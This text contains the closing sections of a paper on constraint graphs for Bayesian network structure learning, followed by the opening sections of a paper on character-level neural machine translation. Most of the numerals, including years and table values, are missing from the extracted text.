computational benefits of an acyclic constraint graph modeling the global stock market. in particular, we want to identify for each stock which other stocks are predictive to its performance. we chose to do this by learning a bayesian network over the opening and closing prices of top performing stocks from the new york stock exchange (nyse) in the united states, the tokyo stock exchange (tse) in japan, and the financial times stock exchange (ftse) in england. learning a bayesian network schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. aapl-open xom-close msft-open rtn-close orcl-close googl-open cob-close googl-closebrk.a-close jnj-open gfrd-close wfc-close ge-close pg-open rdsb-close fb-close t-closecvx-close vz-open t-open deb-close ved-open bwng-open bwng-close keisei-open time tse ftse nyse a b opening closing figure a section of the learned bayesian network of the global stock market. (a) the constraint graph contains six nodes, the opening and closing prices for each of the three markets. these are con- nected such that the closing prices in a market depend on the opening prices but also the most recent in- ternational activity. (b) the most connected subset of stocks from the learned network covering vari- ables. over all variables is clearly infeasible, so we encode in our constraint graph some common-sense restrictions (fig. a). specifically, opening and closing prices for the same market are grouped into separate nodes, for a total of six nodes in the constraint graph. 
there are no self-loops because the opening price of one stock does not influence the opening price of another stock. naturally, the closing prices of one group of stocks are influenced by the opening price of the stocks from the same market, but they are also influenced by the opening or closing prices of any markets which opened or closed in the meantime. for instance, the tse closes after the ftse opens, so the ftse opening prices have the opportunity to influence the tse closing prices. however, the tse closes before the nyse opens, so the nyse cannot influence those stock prices. the dataset consists of opening and closing prices from these stocks between december nd, and november th, , binarized to indicate whether the value was an increase compared to the prior price seen. the resulting bayesian network has some interesting connections (fig. b). for example, the opening price of microsoft influences the closing price of raytheon, and the closing price of debenhams plc, a british multinational realtor, influences the closing price of ge. in addition, there were some surprising and unexplained connections, such as google and johnson & johnson influencing the closing price of cobham plc, a british defense firm. given that this example is primarily to illustrate the types of constraints a constraint graph can easily model, we suggest caution in thinking too deeply about these connections. schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table model comparison between naive bayes, bayesian network classifiers (bnc), and random for- est. three algorithms were evaluated on the uci handwritten digits dataset, fed in the binarized value cor- responding to whether the intensity of a pixel was above average. the fitting time and test set accuracy are reported for each algorithm. model train time (s) test set accuracy naive bayes . . bnc . . random forest . . it took only∼ s on a computer with modest hardware to run bnsl over samples. if we set the maximum number of parents to three, which is the empirically determined maximum number of parents, then it only takes∼ s to run. in contrast it would be infeasi- ble to run the exact bnsl algorithm on even half the number of variables considered here. constraint graphs allow learning of bayesian network classifiers bayesian network classifiers are an extension of bayesian networks to supervised learning tasks by defining a bayesian network over both the feature variables and the target variables together. normal inference methods are used to predict the target variables given the observed feature variables. in the case where feature variables are always observed, only the markov blanket of the target variables must be defined, i.e., their parents and children. the other variables are independent of the target variables and can be discarded, serving as a form of feature selection. a popular bayesian network classifier is the naive bayes classifier that defines a single class variable as the parent to all feature variables. a natural extension to this method is to learn which features are useful, instead of assuming they all are, thereby combining feature selection with parameter learning in a manner that has some similarities to decision trees. this approach can be modeled by using a constraint graph that has all feature variables x in one node and all target variables y in its parent node, such that y →x. 
we empirically evaluated the performance of learning a simple bayesian network classifier on the uci digits dataset. the digits dataset is a collection of × images of handwritten digits, where the features are discretized values between and representing the intensity of that pixel and the labels are between and representing the digit stored there. we learn a bayesian network where the pixels are in one node in the constraint graph and the class label is by itself it another node in the constraint graph that serves as a parent. we then train a bayesian network classifier, a naive bayes classifier, and a random forest classifier comprised of trees, on a test set of , images and test their performance on a held out images. as expected, the learned bayesian network classifier falls between naive bayes and the random forest in terms of both training time and test set performance (table ). futhermore, more complicated bayesian network classifiers can be learned with different constraint graphs. one interesting extension is that instead of constraining all features to be children of the target variable, to allow features to be either parents or children of the target variable. this can be specified by a cyclic constraint graph where y →x →y, preventing schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table algorithm comparison on a node with a self loop and other parents. the exact algorithm and the constrained algorithm proposed here were on a scc comprosied of a main node with a self loop and one parent node. shown are the results of increasing the number of variables in the main node while keep- ing the variables in the parent node steady at five, and the results of increasing the number of variables in the parent node while keeping the number of variables in the main node constant. for both algorithms we show the number of nodes across all parent graphs (pgn), the number of nodes in the order graph (ogn), the number of edges in the order graph (oge) and the time to compute. exact constraint graph pgn ogn oge time (s) pgn ogn oge time (s) variables , , . , . , , , . , , . , , , , , . , , , . parents , , . , . , , , . , . , , , , , . , . the model from spending time identifying dependencies between the features. finally, in cases where some features may be missing, it may be beneficial to model all dependencies between the features in order to allow inference to flow from observed variables not directly connected to the target variables to the target variables. this can be modeled by adding a self loop on the features variables x, allowing all edges to be learned except those between pairs of target variables. learning a bayesian network classifier in this manner will suffer from the same computational challenges as an unconstrained version, given the looseness of the constraints. self-loops and parents we then turn to the case where the strongly connected component is a main node with a self loop and a parent node. because an order graph is defined only over the variables in the main node its size is invariant to the number of variables in the parent node, allowing for speed improvements when it comes to calculating the shortest path. in addition, parent graphs are only defined for variables in the parent set, and so while they are not smaller than the ones in the exact algorithm, there are fewer. 
we compare the computational time and complexity of the underlying order and parent graphs between the exact algorithm over the full set of variables and the modified algorithm based on a constraint graph (table ). the data consisted of randomly generated binary values, because the running time does not depend on the presence of underlying structure in the data. we note that in all cases there are significant speed improvements and simpler graphs but that there are particularly encouraging speed improvements when the number of variables in the main node are increased. this suggests that it is always worth the time to identify which variables can be moved from a node with a self loop to a separate node. schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. c d a b figure cyclic constraint graphs. (a) this constraint graph is comprised of a simple two node cy- cle with each node containing four variables. (b) the learned bayesian network on random data where some variables were forced to identical values. each circle here corresponds to a variable in the resulting bayesian network instead of a node in the constraint graph. there were multiple possible cycles which could have been formed but the constraint graph prevented that from occuring. (c) this constraint graph now encodes a four node cycle each with four variables. (d) the learned bayesian network on random data with two distinct loops of identical values forced. again, no loops are formed. cyclic constraint graphs lastly, we consider constraint graphs that encode cyclic prior knowledge. we visually inspect the results from cyclic constraint graphs to ensure that they do not produce cyclic bayesian networks even when the potential exists. two separate constraint graphs are inspected, a two node cycle and a four node cycle (figs. a and c). the dataset is comprised of random binary values, where the value of one variable in the cycle is copied to the other variables in the cycle to add synthetic structure. however, by jointly solving all nodes cycles are avoided while dependencies are still captured (figs. b and d). we then compare the exact algorithm without constraints to the use of an appropriate constraint graph in a similer manner as before (table ). this is done first for four node cycles where we increase the number of variables in each node of the constraint graph and then for increasing sized cycles with three variables per node. the exact algorithm likely produces structures that are invalid according to the constraints and so this comparison is done solely to highlight that efficiencies are gained by considering the constraints. in each case using a constraint graph yields simpler parent and order graphs and the computational time is significantly reduced. the biggest difference is in the number of nodes in the parent graphs, as the constraints place significant limitations on which variables are allowed to be parents for which other variables. since the construction of the parent graph is the only part of the algorithm which considers the dataset itself it is unsurprising that significant savings are achieved for larger datasets when much smaller parent graphs are used. schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table algorithm comparison on a cyclic constraint graph. 
the exact algorithm and the constrained algorithm proposed here were run for four node cycles with differing numbers of variables, cycles with different numbers of nodes but three variables per node, and differing numbers of sam- ples for a four-node, three-variable cycle. all experiments with differing numbers of variables or nodes were run on , randomly generated sam- ples. shown for both algorithms are the number of nodes across all parent graphs (pgn), the number of nodes in the order graph (ogn), the num- ber of edges in the order graph (oge) and the time to compute. since the number of nodes does not change as a function of samples those values are not repeated in the blank cells. exact exact pgn ogn oge time (s) pgn ogn oge time (s) variables . . , , . . , , , . , , . , , , . , , . nodes . . , , , . , , . , , , , , . , , , . samples , , , . , , . , – – – . – – – . , – – – . – – – . , – – – . – – – . discussion constraint graphs are a flexible way of encoding into the bnsl task prior knowledge concerning the relationships among variables. the graph structure can be exploited to identify potentially massive computational gains, and acyclic constraint graphs make problems tractable which would be infeasible to solve without constraints. this is particularly useful in cases where there are both a great number of variables and many constraints present from prior knowledge. we anticipate that the automatic manner in which parallelizable subtasks are identified in a constraint graph will be of particular interest given the recent increase in availability of distributed computing. although the networks learned in this paper are discrete, the same principles can be applied to all types of bayesian networks. because the constraint graph represents only a restriction in the parent set on a variable-by-variable basis, the same algorithms that are used to learn linear gaussian or hybrid networks can be seamlessly combined with the idea of a constraint graph. in addition, most of the approximation algorithms which have been developed for bnsl can be modified to take into account constraints because these algorithms simply encode a limitation on the parent set for each variable. one could extend constraint graphs in several interesting ways. the first is to assign weights to edges so that the weight represents the prior probability that the variables in the parent set are parents of the variables in the child set, perhaps as pseudocounts to take into account when coupled with a bayesian scoring function. a second way is to incorporate ‘‘hidden nodes’’ that are variables which model underlying, onobserved phenomena and schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. can be used to reduce the parameterization of the network. several algorithms have been proposed for learning the structure of a bayesian network given hidden variables (elidan et al., ; elidan & friedman, ; friedman, ). modifying these algorithms to obey a constraint graph seems like a promising way to incorporate restrictions on this difficult task. a final way may be to encode ancestral relationships instead of direct parent relationships, indicating that a given variable must occur at some point before some other variable in the topological ordering. acknowledgements we would like to acknowledge maxwell libbrecht, scott lundberg, and brandon malone for many useful discussions and comments on drafts of the paper. 
additional information and declarations funding this work is supported by an nsf igert grant dge- . there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: nsf igert: dge- . competing interests the authors declare there are no competing interests. author contributions • jacob m. schreiber conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • william s. noble analyzed the data, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: code implementing the concept is available at github: www.github.com/jmschrei/pomegranate data and code reproducing the figures are available at github: https://github.com/ jmschrei/constraint_graphs. references campos c, ji q. . efficient structure learning of bayesian networks using constraints. journal of machine learning research : – . schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com www.github.com/jmschrei/pomegranate https://github.com/jmschrei/constraint_graphs https://github.com/jmschrei/constraint_graphs http://dx.doi.org/ . /peerj-cs. chow c, liu c. . approximating discrete probability distributions with dependence trees. ieee transactions on information theory ( ): – . cooper g, herskovits e. . a bayesian method for the induction of probabilistic networks from data. machine learning : – doi . /bf . elidan g, friedman n. . learning hidden variable networks: the information bottleneck approach. journal of machine learning research : – . elidan g, lotner n, friedman n, koller d. . discovering hidden variables: a structure-based approach. in: leen tk, dietterich tg, tresp v, eds. advances in neural information processing systems (nips), vol. , – . fan x, malone bm, yuan c. . finding optimal bayesian network structures with constraints learned from data. in: uai’ proceedings of the thirtieth conference on uncertainty in artificial intelligence, – . friedman n. . learning belief networks in the presence of missing values and hidden variables. in: icml’ proceedings of the fourteenth international conference on machine learning, – . gamberoni g, lamma e, riguzzi f, storari s, volinia s. . bayesian networks learn- ing for gene expression datasets. in: advances in intelligent data analysis vi: th inter- national symposium on intelligent data analysis, – doi . / _ . heckerman d, geiger d, chickering d. . learning bayesian networks: the combina- tion of knowledge and statistical data. machine learning : – . jaakkola t, sontag d, globerson a, meila m. . learning bayesian network structure using lp relaxations. in: proceedings of the thirteenth international conference on artificial intelligence and statistics (aistats- ), – . malone bm, yuan c, hansen ea. . memory-efficient dynamic programming for learning optimal bayesian networks. in: proceedings of the twenty-fifth aaai conference on artificial intelligence. moore a, wong w. . optimal reinsertion: a new search operator for accelerated and more accurate bayesian network structure learning. in: proceedings of the th international conference on machine learning (icml- ), – . ordyniak s, szeider s. . 
parameterized complexity results for exact bayesian network structure learning. journal of artificial intelligence research : – .
perrier e, imoto s, miyano s. . finding optimal bayesian network given a super-structure. journal of machine learning research : – .
schneiderman h. . learning a restricted bayesian network for object detection. in: proceedings of the ieee computer society conference on computer vision and pattern recognition. ieee, – .
suzuki j. . learning bayesian belief networks based on the minimum description length principle: an efficient algorithm using the b & b technique. in: machine learning, proceedings of the thirteenth international conference (icml' ).
tarjan r. . depth-first search and linear graph algorithms. siam journal of computing : – .
tsamardinos i, brown le, aliferis cf. . the max–min hill-climbing bayesian network structure learning algorithm. machine learning : – .
yuan c, malone bm, wu x. . learning optimal bayesian networks using a* search. in: ijcai proceedings-international joint conference on artificial intelligence.
zhou h, sakane s. . learning bayesian network structure from environment and sensor planning for mobile robot localization. in: proceedings of ieee international conference on multisensor fusion and integration for intelligent systems, mfi doi . /mfi- . . .
zuo y, kita e. . up/down analysis of stock index by using bayesian network. engineering management research : – .

fully character-level neural machine translation without explicit segmentation

jason lee∗ (eth zürich, jasonlee@inf.ethz.ch), kyunghyun cho (new york university, kyunghyun.cho@nyu.edu), thomas hofmann (eth zürich, thomas.hofmann@inf.ethz.ch)

abstract

most existing machine translation systems operate at the level of words, relying on explicit segmentation to extract tokens. we introduce a neural machine translation (nmt) model that maps a source character sequence to a target character sequence without any segmentation. we employ a character-level convolutional network with max-pooling at the encoder to reduce the length of the source representation, allowing the model to be trained at a speed comparable to subword-level models while capturing local regularities. our character-to-character model outperforms a recently proposed baseline with a subword-level encoder on wmt' de-en and cs-en, and gives comparable performance on fi-en and ru-en. we then demonstrate that it is possible to share a single character-level encoder across multiple languages by training a model on a many-to-one translation task.
in this multilingual setting, the character-level encoder significantly outperforms the subword-level encoder on all the language pairs. we observe that on cs-en, fi-en and ru-en, the quality of the multilingual character-level translation even surpasses the models specifically trained on that language pair alone, both in terms of the bleu score and human judgment.

introduction

nearly all previous work in machine translation has been at the level of words. aside from our intuitive understanding of word as a basic unit of meaning (jackendoff, ), one reason behind this is that sequences are significantly longer when represented in characters, compounding the problem of data sparsity and modeling long-range dependencies. this has driven nmt research to be almost exclusively word-level (bahdanau et al., ; sutskever et al., ).

despite their remarkable success, word-level nmt models suffer from several major weaknesses. for one, they are unable to model rare, out-of-vocabulary words, making them limited in translating languages with rich morphology such as czech, finnish and turkish. if one uses a large vocabulary to combat this (jean et al., ), the complexity of training and decoding grows linearly with respect to the target vocabulary size, leading to a vicious cycle.

to address this, we present a fully character-level nmt model that maps a character sequence in a source language to a character sequence in a target language. we show that our model outperforms a baseline with a subword-level encoder on de-en and cs-en, and achieves a comparable result on fi-en and ru-en. a purely character-level nmt model with a basic encoder was proposed as a baseline by luong and manning ( ), but training it was prohibitively slow. we were able to train our model at a reasonable speed by drastically reducing the length of the source sentence representation using a stack of convolutional, pooling and highway layers.

one advantage of character-level models is that they are better suited for multilingual translation than their word-level counterparts, which require a separate word vocabulary for each language. we verify this by training a single model to translate four languages (german, czech, finnish and russian) to english. our multilingual character-level model outperforms the subword-level baseline by a considerable margin in all four language pairs, strongly indicating that a character-level model is more flexible in assigning its capacity to different language pairs. furthermore, we observe that our multilingual character-level translation even exceeds the quality of bilingual translation in three out of four language pairs, both in bleu score metric and human evaluation. this demonstrates excellent parameter efficiency of character-level translation in a multilingual setting. we also showcase our model's ability to handle intra-sentence code-switching while performing language identification on the fly.

∗ the majority of this work was completed while the author was visiting new york university.
the contributions of this work are twofold: we empirically show that ( ) we can train a character-to-character nmt model without any explicit segmentation; and ( ) we can share a single character-level encoder across multiple languages to build a multilingual translation system without increasing the model size.

background: attentional neural machine translation

neural machine translation (nmt) is a recently proposed approach to machine translation that builds a single neural network which takes as input a source sentence $x = (x_1, \ldots, x_{T_x})$ and generates its translation $y = (y_1, \ldots, y_{T_y})$, where $x_t$ and $y_{t'}$ are source and target symbols (bahdanau et al., ; sutskever et al., ; luong et al., ; cho et al., a). attentional nmt models have three components: an encoder, a decoder and an attention mechanism.

encoder. given a source sentence $x$, the encoder constructs a continuous representation that summarizes its meaning with a recurrent neural network (rnn). a bidirectional rnn is often implemented as proposed in bahdanau et al. ( ). a forward encoder reads the input sentence from left to right: $\overrightarrow{h}_t = \overrightarrow{f}_{\mathrm{enc}}\big(E_x(x_t), \overrightarrow{h}_{t-1}\big)$. similarly, a backward encoder reads it from right to left: $\overleftarrow{h}_t = \overleftarrow{f}_{\mathrm{enc}}\big(E_x(x_t), \overleftarrow{h}_{t+1}\big)$, where $E_x$ is the source embedding lookup table, and $\overrightarrow{f}_{\mathrm{enc}}$ and $\overleftarrow{f}_{\mathrm{enc}}$ are recurrent activation functions such as long short-term memory units (lstms) (hochreiter and schmidhuber, ) or gated recurrent units (grus) (cho et al., b). the encoder constructs a set of continuous source sentence representations $C$ by concatenating the forward and backward hidden states at each timestep: $C = \{h_1, \ldots, h_{T_x}\}$, where $h_t = [\overrightarrow{h}_t; \overleftarrow{h}_t]$.

attention. first introduced in bahdanau et al. ( ), the attention mechanism lets the decoder attend more to different source symbols for each target symbol. more concretely, it computes the context vector $c_{t'}$ at each decoding time step $t'$ as a weighted sum of the source hidden states: $c_{t'} = \sum_{t=1}^{T_x} \alpha_{t't} h_t$. similarly to chung et al. ( ) and firat et al. ( a), each attentional weight $\alpha_{t't}$ represents how relevant the $t$-th source token $x_t$ is to the $t'$-th target token $y_{t'}$, and is computed as:

$\alpha_{t't} = \frac{1}{Z} \exp\Big(\mathrm{score}\big(E_y(y_{t'-1}), s_{t'-1}, h_t\big)\Big), \qquad ( )$

where $Z = \sum_{k=1}^{T_x} \exp\big(\mathrm{score}(E_y(y_{t'-1}), s_{t'-1}, h_k)\big)$ is the normalization constant. $\mathrm{score}()$ is a feed-forward neural network with a single hidden layer that scores how well the source symbol $x_t$ and the target symbol $y_{t'}$ match. $E_y$ is the target embedding lookup table and $s_{t'}$ is the target hidden state at time $t'$.

decoder. given a source context vector $c_{t'}$, the decoder computes its hidden state at time $t'$ as $s_{t'} = f_{\mathrm{dec}}\big(E_y(y_{t'-1}), s_{t'-1}, c_{t'}\big)$. then, a parametric function $\mathrm{out}_k()$ returns the conditional probability of the next target symbol being $k$:

$p(y_{t'} = k \mid y_{<t'}, x) = \frac{1}{Z} \exp\Big(\mathrm{out}_k\big(E_y(y_{t'-1}), s_{t'}, c_{t'}\big)\Big), \qquad ( )$

where $Z$ is again the normalization constant: $Z = \sum_j \exp\big(\mathrm{out}_j(E_y(y_{t'-1}), s_{t'}, c_{t'})\big)$.

training. the entire model can be trained end-to-end by minimizing the negative conditional log-likelihood, which is defined as

$\mathcal{L} = -\frac{1}{N} \sum_{n=1}^{N} \sum_{t=1}^{T_y^{(n)}} \log p\big(y_t = y_t^{(n)} \mid y_{<t}^{(n)}, x^{(n)}\big),$

where $N$ is the number of sentence pairs, and $x^{(n)}$ and $y_t^{(n)}$ are the source sentence and the $t$-th target symbol in the $n$-th pair, respectively.

fully character-level translation

why character-level?

the benefits of character-level translation over word-level translation are well known. chung et al.
( ) present three main arguments: character level models ( ) do not suffer from out-of-vocabulary is- sues, ( ) are able to model different, rare morpho- logical variants of a word, and ( ) do not require seg- mentation. particularly, text segmentation is highly non-trivial for many languages and problematic even for english as word tokenizers are either manually designed or trained on a corpus using an objective function that is unrelated to the translation task at hand, which makes the overall system sub-optimal. here we present two additional arguments for character-level translation. first, a character-level translation system can easily be applied to a mul- tilingual translation setting. between european lan- guages where the majority of alphabets overlaps, for instance, a character-level model may easily iden- tify morphemes that are shared across different lan- guages. a word-level model, however, will need a separate word vocabulary for each language, allow- ing no cross-lingual parameter sharing. also, by not segmenting source sentences into words, we no longer inject our knowledge of words and word boundaries into the system; instead, we encourage the model to discover an internal struc- ture of a sentence by itself and learn how a sequence of symbols can be mapped to a continuous meaning representation. . related work to address these limitations associated with word- level translation, a recent line of research has inves- tigated using sub-word information. costa-jussá and fonollosa ( ) replaced the word-lookup table with convolutional and highway layers on top of character embeddings, while still segmenting source sentences into words. target sen- tences were also segmented into words, and predic- tions were made at word-level. similarly, ling et al. ( ) employed a bidirec- tional lstm to compose character embeddings into word embeddings. at the target side, another lstm takes the hidden state of the decoder and generates the target word, character by character. while this system is completely open-vocabulary, it also re- quires offline segmentation. character-to-word and word-to-character lstms significantly slow down training, as well. most recently, luong and manning ( ) pro- posed a hybrid scheme that consults character-level information whenever the model encounters an out- of-vocabulary word. as a baseline, they also imple- mented a purely character-level nmt model with layers of unidirectional lstms with cells, with attention over each character. despite being extremely slow (approximately months to train), the character-level model gave a comparable perfor- mance to the word-level baseline. this shows the possibility of fully character-level translation. having a word-level decoder restricts the model to only being able to generate previously seen words. sennrich et al. ( ) introduced a subword-level nmt model that is capable of open-vocabulary translation using subword-level segmentation based on the byte pair encoding (bpe) algorithm. starting from a character vocabulary, the algorithm identi- fies frequent character n-grams in the training data and iteratively adds them to the vocabulary, ulti- mately giving a subword vocabulary which consists of words, subwords and characters. once the seg- mentation rules have been learned, their model per- forms subword-to-subword translation (bpe bpe) in the same way as word-to-word translation. 
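as a rough illustration of the bpe procedure just described, the sketch below learns merge operations from word frequencies by repeatedly merging the most frequent adjacent symbol pair. it is a toy re-implementation in the spirit of sennrich et al., not their released script, and the example corpus is invented:

```python
from collections import Counter

def learn_bpe(word_freqs, num_merges):
    """learn bpe merge operations: start from characters and repeatedly
    merge the most frequent adjacent pair of symbols in the corpus."""
    # represent each word as a tuple of symbols, with an end-of-word marker
    vocab = {tuple(word) + ("</w>",): freq for word, freq in word_freqs.items()}
    merges = []
    for _ in range(num_merges):
        pairs = Counter()
        for symbols, freq in vocab.items():
            for a, b in zip(symbols, symbols[1:]):
                pairs[(a, b)] += freq
        if not pairs:
            break
        best = max(pairs, key=pairs.get)
        merges.append(best)
        new_vocab = {}
        for symbols, freq in vocab.items():
            out, i = [], 0
            while i < len(symbols):
                if i < len(symbols) - 1 and (symbols[i], symbols[i + 1]) == best:
                    out.append(symbols[i] + symbols[i + 1])
                    i += 2
                else:
                    out.append(symbols[i])
                    i += 1
            new_vocab[tuple(out)] = freq
        vocab = new_vocab
    return merges

# on this invented corpus, frequent pairs such as ('l', 'o') and ('lo', 'w')
# are merged first, building up subwords from characters.
print(learn_bpe({"low": 5, "lower": 2, "lowest": 1}, num_merges=4))
```

after the merges are learned, segmentation of new text simply replays the merge operations in order, which is why the segmentation is fixed before translation training begins.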
perhaps the work that is closest to our end goal is (chung et al., ), which used a subword-level encoder from (sennrich et al., ) and a fully character-level decoder (bpe char). their results show that character-level decoding performs better than subword-level decoding. motivated by this work, we aim for fully character-level translation at both sides (char char). outside nmt, our work is based on a few exist- ing approaches that applied convolutional networks to text, most notably in text classification (zhang et al., ; xiao and cho, ). we also drew in- spiration for our multilingual models from previous work that showed the possibility of training a single recurrent model for multiple languages in domains other than translation (tsvetkov et al., ; gillick et al., ). . challenges sentences are on average (de, cs and ru) to (fi) times longer when represented in characters. this poses three major challenges to achieving fully character-level translation. ( ) training/decoding latency for the decoder, al- though the sequence to be generated is much longer, each character-level softmax operation costs consid- erably less compared to a word- or subword-level softmax. chung et al. ( ) report that character- level decoding is only % slower than subword- level decoding. on the other hand, computational complexity of the attention mechanism grows quadratically with respect to the sentence length, as it needs to attend to every source token for every target token. this makes a naive character-level approach, such as in luong and manning ( ), computationally prohibitive. consequently, reducing the length of the source sequence is key to ensuring reasonable speed in both training and decoding. ( ) mapping character sequence to continuous representation the arbitrary relationship between the orthography of a word and its meaning is a well- known problem in linguistics (de saussure, ). building a character-level encoder is arguably a more difficult problem, as the encoder needs to learn a highly non-linear function from a long sequence of character symbols to a meaning representation. ( ) long range dependencies in characters a character-level encoder needs to model dependen- cies over longer timespans than a word-level en- coder does. fully character-level nmt . encoder we design an encoder that addresses all the chal- lenges discussed above by using convolutional and pooling layers aggressively to both ( ) drastically shorten the input sentence; and ( ) efficiently capture local regularities. inspired by the character- level language model from kim et al. ( ), our encoder first reduces the source sentence length with a series of convolutional, pooling and highway layers. the shorter representation, instead of the full character sequence, is passed through a bidirectional gru to ( ) help it resolve long term dependencies. we illustrate the proposed encoder in figure and discuss each layer in detail below. embedding we map the sequence of source characters (x , . . . ,xtx) to a sequence of character embeddings of dimensionality dc: x = (c(x ), . . . ,c(xtx)) ∈ rdc×tx where tx is the number of source characters and c is the character embedding lookup table: c ∈ rdc×|c|. convolution one-dimensional convolution opera- tion is then used along consecutive character embed- dings. assuming we have a single filter f ∈ rdc×w of width w, we first apply padding to the beginning and the end of x, such that the padded sentence x′ ∈ rdc×(tx+w− ) is w − symbols longer. 
we then apply a narrow convolution between $X'$ and $f$ such that the $k$-th element of the output $Y_k$ is given as:

$Y_k = (X' * f)_k = \sum_{i,j} \big(X'_{[:,\, k-w+1:k]} \otimes f\big)_{ij}, \qquad ( )$

where $\otimes$ denotes elementwise matrix multiplication and $*$ is the convolution operation. $X'_{[:,\, k-w+1:k]}$ is the sliced subset of $X'$ that contains all the rows but only $w$ adjacent columns. the padding scheme employed above, commonly known as half convolution, ensures that the length of the output is identical to the length of the input (i.e., $Y \in \mathbb{R}^{1 \times T_x}$).

we just illustrated how a single convolutional filter of fixed width might be applied to a sentence. in order to extract informative character patterns of different lengths, we employ a set of filters of varying widths. more concretely, we use a filter bank $F = \{f_1, \ldots, f_m\}$, where $f_i \in \mathbb{R}^{d_c \times i \times n_i}$ is a collection of $n_i$ filters of width $i$. our model uses $m = $ , hence extracting character n-grams up to characters long. outputs from all the filters are stacked upon each other, giving a single representation $Y \in \mathbb{R}^{N \times T_x}$, where the dimensionality of each column is given by the total number of filters $N = \sum_{i=1}^{m} n_i$. finally, rectified linear activation (relu) is applied elementwise to this representation.

figure : encoder architecture schematics, illustrated over the padded example "_ _ t h e s e c o n d p e r s o n _ _" (character embeddings → single-layer convolution + relu → max pooling with stride → four-layer highway network → single-layer bidirectional gru, yielding segment embeddings). underscore denotes padding. a dotted vertical line delimits each segment. the stride of pooling $s$ is in the diagram.

max pooling with stride. the output from the convolutional layer is first split into segments of width $s$, and max-pooling over time is applied to each segment with no overlap. this procedure selects the most salient features to give a segment embedding. each segment embedding is a summary of meaningful character n-grams occurring in a particular (overlapping) subsequence in the source sentence. note that the rightmost segment (above 'on') in figure may capture 'son' (the filter in green) although 's' occurs in the previous segment. in other words, our segments are overlapping, as opposed to word- or subword-level models with hard segmentation. segments act as our internal linguistic unit from this layer and above: the attention mechanism, for instance, attends to each source segment instead of each source character. this shortens the source representation $s$-fold: $Y' \in \mathbb{R}^{N \times (T_x / s)}$. empirically, we found that using a smaller $s$ leads to better performance at increased training time. we chose $s = $ in our experiments as it gives a reasonable balance between the two.

highway network. a sequence of segment embeddings from the max pooling layer is fed into a highway network (srivastava et al., ). highway networks are shown to significantly improve the quality of a character-level language model when used with convolutional layers (kim et al., ). a highway network transforms its input $x$ with a gating mechanism that adaptively regulates information flow:

$y = g \odot \mathrm{relu}(W_H x + b_H) + (1 - g) \odot x, \quad \text{where } g = \sigma(W_g x + b_g).$

we apply this to each segment embedding individually.

recurrent layer. finally, the output from the highway layer is given to a bidirectional gru (as described in the background section), using each segment embedding as input.
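the encoder stack just described can be sketched roughly as follows. this is not the authors' code: the filter widths and counts, pooling stride, number of highway layers and gru size below are placeholders standing in for configuration values that are not legible in this copy of the paper.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class CharEncoder(nn.Module):
    """character embeddings -> multi-width conv bank + relu -> non-overlapping
    max-pooling with stride s -> highway layers -> bidirectional gru over the
    resulting segment embeddings."""
    def __init__(self, vocab_size, emb_dim=128,
                 filters=((1, 200), (2, 200), (3, 250), (4, 250)),  # (width, count)
                 stride=5, n_highway=4, hidden=512):
        super().__init__()
        self.emb = nn.Embedding(vocab_size, emb_dim)
        # one conv per filter width; "half convolution" padding keeps length T_x
        self.convs = nn.ModuleList(
            [nn.Conv1d(emb_dim, n, kernel_size=w, padding=w // 2) for w, n in filters]
        )
        n_total = sum(n for _, n in filters)
        self.stride = stride
        self.transforms = nn.ModuleList([nn.Linear(n_total, n_total) for _ in range(n_highway)])
        self.gates = nn.ModuleList([nn.Linear(n_total, n_total) for _ in range(n_highway)])
        self.gru = nn.GRU(n_total, hidden, batch_first=True, bidirectional=True)

    def forward(self, chars):                             # chars: (batch, T_x) int64
        t_x = chars.size(1)
        x = self.emb(chars).transpose(1, 2)               # (batch, emb_dim, T_x)
        # stack the relu'd outputs of every filter width; slice to length T_x
        y = torch.cat([F.relu(conv(x))[:, :, :t_x] for conv in self.convs], dim=1)
        y = F.max_pool1d(y, kernel_size=self.stride)      # segments of width s, no overlap
        y = y.transpose(1, 2)                             # (batch, T_x // s, N)
        for transform, gate in zip(self.transforms, self.gates):
            g = torch.sigmoid(gate(y))
            y = g * F.relu(transform(y)) + (1 - g) * y    # highway layer, per segment
        out, _ = self.gru(y)                              # (batch, T_x // s, 2 * hidden)
        return out

enc = CharEncoder(vocab_size=300)
segments = enc(torch.randint(0, 300, (2, 100)))           # two sentences of 100 characters
print(segments.shape)                                      # torch.Size([2, 20, 1024])
```

the shape printed at the end makes the s-fold shortening visible: a 100-character input is reduced to 20 segment representations before attention is ever applied.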
subword-level encoder unlike a subword-level encoder, our model does not commit to a specific choice of segmentation; instead it is trained to consider every possible character pattern and extract only the most meaningful ones. therefore, the definition of segmentation in our model is dynamic unlike subword-level encoders. during training, the model finds the most salient character patterns in a sentence via max-pooling, and the character bilingual bpe char char char vocab size , source emb. target emb. conv. filters - - - - - - - pool stride highway layers encoder -layer grus decoder -layer grus table : bilingual model architectures. the char char model uses filters of width , filters of width , · · · and filters of width . sequences extracted by the model change over the course of training. this is in contrast to how bpe segmentation rules are learned: the segmentation is learned and fixed before training begins. . attention and decoder similarly to the attention model in chung et al. ( ) and firat et al. ( a), a single-layer feed- forward network computes the attention score of next target character to be generated with every source segment representation. a standard two- layer character-level decoder then takes the source context vector from the attention mechanism and predicts each target character. this decoder was de- scribed as base decoder by chung et al. ( ). experiment settings . task and models we evaluate the proposed character-to-character (char char) translation model against subword- level baselines (bpe bpe and bpe char) on the wmt’ de→en, cs→en, fi→en and ru→en translation tasks. we do not consider word-level models, as it has already been shown that subword-level models outperform them by mit- igating issues inherent to 